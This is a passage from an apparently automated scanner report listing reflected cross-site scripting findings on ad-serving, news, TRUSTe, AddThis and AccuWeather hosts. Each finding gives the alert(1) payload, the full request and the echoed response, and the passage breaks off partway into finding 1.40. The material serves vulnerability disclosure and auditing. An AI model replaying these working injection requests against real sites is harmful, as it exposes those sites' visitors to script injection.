Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 86d9f<img%20src%3da%20onerror%3dalert(1)>fcea5a88802 was submitted in the cid parameter. This input was echoed as 86d9f<img src=a onerror=alert(1)>fcea5a88802 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick86d9f<img%20src%3da%20onerror%3dalert(1)>fcea5a88802&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4CBBAE03D814E81407E7BA4F085CD829; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 730
Date: Tue, 08 Feb 2011 02:46:35 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D1","override":true,"vchannel":"9075","cid":"EI9-DR-Interclick86d9f<img src=a onerror=alert(1)>fcea5a88802","version":2};
document.write('<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536')+'" type="text/javascript" charset="utf-8">
...[SNIP]...

1.28. http://ads.adxpose.com/ads/tag.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf953<img%20src%3da%20onerror%3dalert(1)>4539cb68142 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf953<img src=a onerror=alert(1)>4539cb68142 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1&bf953<img%20src%3da%20onerror%3dalert(1)>4539cb68142=1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B8EF74BD1318423C8700FF923C3BB0EA; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 737
Date: Tue, 08 Feb 2011 02:46:51 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","bf953<img src=a onerror=alert(1)>4539cb68142":"1","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl
...[SNIP]...

1.29. http://ads.adxpose.com/ads/tag.js [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 455dd<script>alert(1)</script>4c15da0ec1a was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536455dd<script>alert(1)</script>4c15da0ec1a&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=02E5D788C0C23C97F04D936CD6926031; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 769
Date: Tue, 08 Feb 2011 02:46:32 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536455dd<script>alert(1)<\/script>4c15da0ec1a","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif
...[SNIP]...
<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536455dd<script>alert(1)</script>4c15da0ec1a')+'" type="text/javascript" charset="utf-8">
...[SNIP]...

1.30. http://ads.adxpose.com/ads/tag.js [vchannel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adxpose.com
Path:   /ads/tag.js

Issue detail

The value of the vchannel request parameter is copied into the HTML document as plain text between tags. The payload 8ba3f<img%20src%3da%20onerror%3dalert(1)>f9aed8b297a was submitted in the vchannel parameter. This input was echoed as 8ba3f<img src=a onerror=alert(1)>f9aed8b297a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=90758ba3f<img%20src%3da%20onerror%3dalert(1)>f9aed8b297a&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CA4064B619F49C566DD055974ABE8B44; Path=/
Content-Type: text/javascript;charset=UTF-8
Content-Length: 730
Date: Tue, 08 Feb 2011 02:46:40 GMT
Connection: close

__ADXPOSE_PREFS__ = {"uid":"M6uzDYEbWGBrvdnp_69536","altbannerurl":"http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D1","override":true,"vchannel":"90758ba3f<img src=a onerror=alert(1)>f9aed8b297a","cid":"EI9-DR-Interclick","version":2};
document.write('<scr'+'ipt src="http://ads.adxpose.com/ads/ads.js?uid='+encodeURIComponent('M6uzDYEbWGBrvdnp_69536')+'" type="text/javascript" charset="utf-8">
...[SNIP]...

1.31. http://adserving.cpxinteractive.com/rw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /rw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5e97"><script>alert(1)</script>2d71d7d1b5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=New%20offer%21&qs=iframe3%3FHQ1WAIctGAB7518AAAAAAJOJGQAAAAAAAgAAAAAAAAAAAP8AAAACFcGkJQAAAAAA3xYiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTzg8AAAAAAAICAgAAAAAAGy%2EdJAYBFkAbL90kBgEWQAAAAAAAAAAAAABQJchyE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd%2EzdKjprf%2DlHY8uMhpLJAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enypost%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D1584519%2526%5Fsalt%253D4021573200%2526B%253D10%2526r%253D1%2C3a45ebde%2D3328%2D11e0%2Daebf%2D003048d6d892&b5e97"><script>alert(1)</script>2d71d7d1b5e=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:07:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 814
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>New offer!</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0"
...[SNIP]...
AAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd.zdKjprf-lHY8uMhpLJAAAAAA==,,http%3A%2F%2Fwww.nypost.com%2F,Z%3D0x0%26y%3D29%26s%3D1584519%26_salt%3D4021573200%26B%3D10%26r%3D1,3a45ebde-3328-11e0-aebf-003048d6d892&b5e97"><script>alert(1)</script>2d71d7d1b5e=1">
...[SNIP]...

1.32. http://adserving.cpxinteractive.com/rw [qs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /rw

Issue detail

The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb83e"><script>alert(1)</script>1c12119eb3f was submitted in the qs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=New%20offer%21&qs=cb83e"><script>alert(1)</script>1c12119eb3f HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:07:53 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 353
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>New offer!</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="100%" width="100%" src="http://adserving.cpxinteractive.com/cb83e"><script>alert(1)</script>1c12119eb3f">
...[SNIP]...

1.33. http://adserving.cpxinteractive.com/rw [title parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /rw

Issue detail

The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload b58ee</title><script>alert(1)</script>a694e07824a was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rw?title=New%20offer%21b58ee</title><script>alert(1)</script>a694e07824a&qs=iframe3%3FHQ1WAIctGAB7518AAAAAAJOJGQAAAAAAAgAAAAAAAAAAAP8AAAACFcGkJQAAAAAA3xYiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTzg8AAAAAAAICAgAAAAAAGy%2EdJAYBFkAbL90kBgEWQAAAAAAAAAAAAABQJchyE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd%2EzdKjprf%2DlHY8uMhpLJAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enypost%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D1584519%2526%5Fsalt%253D4021573200%2526B%253D10%2526r%253D1%2C3a45ebde%2D3328%2D11e0%2Daebf%2D003048d6d892 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:07:52 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 817
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title>New offer!b58ee</title><script>alert(1)</script>a694e07824a</title></head><body style="margin-left:0%;margin-right:0%;margin-top:0%;margin-bottom:0%"><iframe allowtransparency="true
...[SNIP]...

1.34. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3931"-alert(1)-"9217cc6e65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0&section=1584519&banned_pop_types=29&pop_times=1&pop_frequency=86400&f3931"-alert(1)-"9217cc6e65a=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:08:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 08 Feb 2011 02:08:13 GMT
Pragma: no-cache
Content-Length: 4401
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1584519; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=29&f3931"-alert(1)-"9217cc6e65a=1&s=1584519&_salt=1433585166";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

1.35. http://breakingnews.nypost.com/dynamic/external/ibd.morningstar.com/AP/StockMover.html [CN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://breakingnews.nypost.com
Path:   /dynamic/external/ibd.morningstar.com/AP/StockMover.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c74dd'><script>alert(1)</script>bdde2c185d was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707c74dd'><script>alert(1)</script>bdde2c185d&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1
Host: breakingnews.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: SITE=NYNYP; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Tue, 08 Feb 2011 02:26:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:26:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Busi
...[SNIP]...
<a href='http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707C74DD'><SCRIPT>ALERT(1)</SCRIPT>BDDE2C185D.html?CN=AP707C74DD'>
...[SNIP]...

1.36. http://breakingnews.nypost.com/dynamic/external/ibd.morningstar.com/AP/StockMover.html [CN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://breakingnews.nypost.com
Path:   /dynamic/external/ibd.morningstar.com/AP/StockMover.html

Issue detail

The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd26"><script>alert(1)</script>c57e8e6769d was submitted in the CN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707ccd26"><script>alert(1)</script>c57e8e6769d&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1
Host: breakingnews.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Linux/SUSE)
Set-Cookie: SITE=NYNYP; Path=/
Set-Cookie: SECTION=DJSP_COMPLETE; Path=/
Content-Type: text/html
Expires: Tue, 08 Feb 2011 02:26:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 02:26:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Busi
...[SNIP]...
<form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707CCD26"><SCRIPT>ALERT(1)</SCRIPT>C57E8E6769D.html" style="margin:0px;">
...[SNIP]...

1.37. http://clicktoverify.truste.com/pvr.php [sealid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clicktoverify.truste.com
Path:   /pvr.php

Issue detail

The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5846%20style%3dx%3aexpression(alert(1))%20a449f0c11e7 was submitted in the sealid parameter. This input was echoed as f5846 style=x:expression(alert(1)) a449f0c11e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /pvr.php?page=validate&url=www.adbrite.com&sealid=102f5846%20style%3dx%3aexpression(alert(1))%20a449f0c11e7 HTTP/1.1
Host: clicktoverify.truste.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 05:46:34 GMT
Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4
X-Powered-By: PHP/5.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 8525


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Validation Page for Online Privacy Certification by TRUSTe</title>
<meta nam
...[SNIP]...
<input
           type='hidden' name='sealid' value=102f5846 style=x:expression(alert(1)) a449f0c11e7>
...[SNIP]...

1.38. http://ds.addthis.com/red/psi/sites/www.starbucks.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.starbucks.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d6dd7<script>alert(1)</script>287b33a9360 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.starbucks.com/p.json?callback=_ate.ad.hprd6dd7<script>alert(1)</script>287b33a9360&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.starbucks.com%2Fsmooth&ref=http%3A%2F%2Fwww.nypost.com%2F&1c4bn7 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh31.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297025629.60|1296659685.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 281
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 08 Feb 2011 03:03:10 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 10 Mar 2011 03:03:10 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297134190.60|1296659685.66; Domain=.addthis.com; Expires=Tue, 05-Feb-2013 18:47:55 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 08 Feb 2011 03:03:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 08 Feb 2011 03:03:10 GMT
Connection: close

_ate.ad.hprd6dd7<script>alert(1)</script>287b33a9360({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d1ec56b7612a62c&curl=http%3a%2f%2fwww.starbucks.com%2fsmooth"],"segments" : ["60"],"loc": "MjAwMDFOQVVTREM
...[SNIP]...

1.39. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 82337<script>alert(1)</script>43f7dbcf295 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.nypost.com%2F&uid=M6uzDYEbWGBrvdnp_6953682337<script>alert(1)</script>43f7dbcf295&xy=697%2C2049&wh=1050%2C1040&vchannel=9075&cid=EI9-DR-Interclick&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.1&altbannerurl=http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B21BCBC2763287B5824AD144E6A526AB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 144
Date: Tue, 08 Feb 2011 02:46:43 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("M6uzDYEbWGBrvdnp_6953682337<script>alert(1)</script>43f7dbcf295");

1.40. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
